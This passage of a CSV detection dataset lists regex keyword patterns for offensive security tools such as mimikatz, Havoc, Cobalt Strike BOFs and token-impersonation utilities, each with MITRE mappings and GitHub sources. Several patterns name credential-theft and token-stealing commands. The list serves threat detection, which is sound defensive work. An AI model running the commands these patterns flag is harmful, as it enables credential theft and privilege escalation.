TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*title logon backdoor*",".{0,1000}title\slogon\sbackdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*Tkn_Access_Check.ps1*",".{0,1000}Tkn_Access_Check\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*",".{0,1000}TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","ntlm decoder","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw==*",".{0,1000}TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw\=\=.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA*",".{0,1000}TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*tls-scanner -connect *:*",".{0,1000}tls\-scanner\s\-connect\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*tmdb-get-company-names *",".{0,1000}tmdb\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*tmenochet/PowerDump*",".{0,1000}tmenochet\/PowerDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*tmp*ciscophones.tgz*",".{0,1000}tmp.{0,1000}ciscophones\.tgz.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*tmp*lsass_*.dmp*",".{0,1000}tmp.{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Tmprovider.dll*",".{0,1000}Tmprovider\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*",".{0,1000}TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*tNidhoggClient.exe*",".{0,1000}tNidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*to $LogonPasswords*",".{0,1000}to\s\$LogonPasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*to_powershell.ducky_script*",".{0,1000}to_powershell\.ducky_script.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*toggle_privileges.cna*",".{0,1000}toggle_privileges\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","51","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*toggle_privileges_bof.*",".{0,1000}toggle_privileges_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","51","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*Toggle_Token_Privileges_BOF*",".{0,1000}Toggle_Token_Privileges_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","51","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*ToggleWDigest*",".{0,1000}ToggleWDigest.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*token find-tokens*",".{0,1000}token\sfind\-tokens.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*token impersonate *",".{0,1000}token\simpersonate\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*token privs-get*",".{0,1000}token\sprivs\-get.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*token privs-list*",".{0,1000}token\sprivs\-list.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*token steal *",".{0,1000}token\ssteal\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*token* -CreateProcess * -ProcessId *",".{0,1000}token.{0,1000}\s\-CreateProcess\s.{0,1000}\s\-ProcessId\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*token* -ImpersonateUser -Username *",".{0,1000}token.{0,1000}\s\-ImpersonateUser\s\-Username\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*token::elevate*",".{0,1000}token\:\:elevate.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*token::list*",".{0,1000}token\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*token::revert*",".{0,1000}token\:\:revert.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*token::run*",".{0,1000}token\:\:run.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*token::whoami*",".{0,1000}token\:\:whoami.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*TokenDump.exe*",".{0,1000}TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*Token-Impersonation -Rev2Self*",".{0,1000}Token\-Impersonation\s\-Rev2Self.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Token-Impersonation -Steal*",".{0,1000}Token\-Impersonation\s\-Steal.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Token-Impersonation.ps1*",".{0,1000}Token\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*TokenKidnapping.cpp*",".{0,1000}TokenKidnapping\.cpp.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*TokenKidnapping.cpp*",".{0,1000}TokenKidnapping\.cpp.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*TokenKidnapping.exe*",".{0,1000}TokenKidnapping\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*TokenPlayer-v0.3.exe*",".{0,1000}TokenPlayer\-v0\.3\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*TokenPlayer-v0.4.exe*",".{0,1000}TokenPlayer\-v0\.4\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*TokenPlayer-v0.5.exe*",".{0,1000}TokenPlayer\-v0\.5\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*TokenPlayer-v0.6.exe*",".{0,1000}TokenPlayer\-v0\.6\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*TokenPlayer-v0.7.exe*",".{0,1000}TokenPlayer\-v0\.7\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*TokenPlayer-v0.8.exe*",".{0,1000}TokenPlayer\-v0\.8\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*tokenprivs.cpp*",".{0,1000}tokenprivs\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" 